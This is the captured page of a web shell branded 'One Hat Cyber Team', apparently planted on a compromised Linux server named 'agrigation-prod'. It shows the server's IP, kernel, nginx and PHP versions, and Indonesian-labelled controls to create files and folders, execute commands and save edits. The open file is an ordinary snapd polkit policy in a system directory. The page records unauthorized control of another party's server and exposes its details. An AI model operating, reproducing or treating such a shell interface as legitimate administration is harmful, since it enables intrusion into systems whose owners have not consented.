One Hat Cyber Team
Your IP :
3.146.176.40
Server IP :
104.21.16.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
polkit-1
/
actions
/
Edit File:
io.snapcraft.snapd.policy
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN" "http://www.freedesktop.org/standards/PolicyKit/1.0/policyconfig.dtd"> <policyconfig> <vendor>Snapcraft</vendor> <vendor_url>http://snapcraft.io</vendor_url> <action id="io.snapcraft.snapd.login"> <description gettext-domain="snappy">Authenticate on snap daemon</description> <message gettext-domain="snappy">Authorization is required to authenticate on the snap daemon</message> <defaults> <allow_any>auth_admin</allow_any> <allow_inactive>auth_admin</allow_inactive> <allow_active>auth_admin_keep</allow_active> </defaults> </action> <action id="io.snapcraft.snapd.manage"> <description gettext-domain="snappy">Install, update, or remove packages</description> <message gettext-domain="snappy">Authentication is required to install, update, or remove packages</message> <defaults> <allow_any>auth_admin</allow_any> <allow_inactive>auth_admin</allow_inactive> <allow_active>auth_admin_keep</allow_active> </defaults> </action> <action id="io.snapcraft.snapd.manage-interfaces"> <description gettext-domain="snappy">Connect, disconnect interfaces</description> <message gettext-domain="snappy">Authentication is required to connect or disconnect interfaces</message> <defaults> <allow_any>auth_admin</allow_any> <allow_inactive>auth_admin</allow_inactive> <allow_active>auth_admin_keep</allow_active> </defaults> </action> <action id="io.snapcraft.snapd.manage-configuration"> <description gettext-domain="snappy">Access or modify snap configuration</description> <message gettext-domain="snappy">Authentication is required to access or modify snap configuration</message> <defaults> <allow_any>auth_admin</allow_any> <allow_inactive>auth_admin</allow_inactive> <allow_active>auth_admin_keep</allow_active> </defaults> </action> </policyconfig>
Simpan